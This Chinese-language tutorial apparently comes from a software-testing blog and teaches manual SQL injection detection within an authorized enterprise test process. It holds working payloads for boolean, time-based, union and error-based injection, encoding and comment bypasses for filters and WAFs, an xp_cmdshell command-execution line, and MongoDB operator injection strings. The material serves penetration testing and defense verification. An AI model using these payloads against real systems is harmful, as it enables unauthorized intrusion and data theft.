1 漏洞原理与检测价值
SQL注入(SQL Injection)作为OWASP Top 10长期上榜的高危漏洞,其本质是攻击者通过构造特殊输入,改变原始SQL查询逻辑的代码注入技术。在自动化工具检测存在盲区的场景下,手工检测展现出不可替代的价值:
逻辑复杂性检测:针对业务规则紧密耦合的多条件查询语句
过滤绕过验证:当应用程序存在基础防护时的渗透测试
二次注入识别:从数据存储到检索使用的完整攻击链分析
2 手工检测方法体系
2.1 信息收集阶段
输入点枚举
显式参数:URL参数、表单字段、HTTP头部(Cookie/User-Agent)
隐式参数:RESTful API路径参数、JSON/XML请求体
文件操作:文件名参数、上传元数据字段
数据库指纹识别
/* 数据库类型判别 */
' AND '1'='1' -- 通用回真测试
' UNION SELECT 1, version() -- 版本信息获取
' OR @@version LIKE '%MySQL%' -- 数据库特征识别
2.2 注入类型检测
基于响应的检测技术
布尔型盲注
原始请求:id=1
攻击负载:id=1' AND '1'='1
id=1' AND '1'='2
观测点:页面内容差异/HTTP状态码变化
时间型盲注
/* MySQL时间延迟 */
' AND SLEEP(5) --
' UNION SELECT 1,2,BENCHMARK(1000000,MD5('test')) --
联合查询注入
' ORDER BY 5-- -- 确定字段数量
' UNION SELECT 1,2,database() -- 获取当前数据库
' UNION SELECT 1,table_name,3 FROM information_schema.tables --
2.3 绕过技术专项检测
编码绕过
URL编码:' → %27 → %2527
Unicode编码:' → %u0027
HTML实体:' → '
注释符变体
/* 多行注释 */
'/**/AND/**/1=1--
# 哈希注释(MySQL)
'%23 AND 1=1--
字符串拼接检测
' OR 'abc'='ab'||'c'--
' EXEC('SELECT' + ' * FROM users') --
3 深度检测技巧
3.1 错误信息分析
通过故意触发数据库错误获取技术信息:
' AND 1=CAST('test' AS INT) -- 类型转换错误
' AND 1 IN (SELECT column_name FROM info) -- 列名枚举
3.2 存储过程检测
针对使用存储过程的应用程序:
'; EXEC xp_cmdshell 'dir' --
' UNION SELECT 1,2 FROM OPENROWSET('SQLNCLI', ...) --
3.3 NoSQL注入检测
虽然非SQL数据库,但注入原理相似:
// MongoDB操作符注入
username[$ne]=null&password[$ne]=null
// JSON注入
{"$where": "this.credits - this.debits < 0"}
4 企业级测试流程
4.1 测试前准备
获取测试授权书与范围界定文档
准备测试用例库(包含正常/边界/异常用例)
搭建与生产环境一致的测试环境
4.2 测试执行规范
影响评估:每次注入前评估可能的数据破坏风险
数据备份:对关键业务数据执行备份操作
流量记录:使用Burp Suite等工具完整记录测试流量
问题复现:确保每个漏洞可稳定复现
4.3 结果报告要点
漏洞位置(URL、参数、触发条件)
攻击负载与完整请求/响应记录
风险等级评定(CVSS评分)
修复建议(参数化查询示例)
5 防御措施验证
手工检测完成后,应验证防护措施有效性:
输入验证测试
特殊字符过滤完整性(单引号、分号、注释符)
数据类型强制转换验证
长度限制绕过测试
纵深防御检测
WAF规则绕过测试
数据库权限最小化验证
日志审计完整性检查
精选文章
Python+Playwright+Pytest+BDD:利用FSM构建高效测试框架
软件测试进入“智能时代”:AI正在重塑质量体系
微服务架构下的契约测试实践
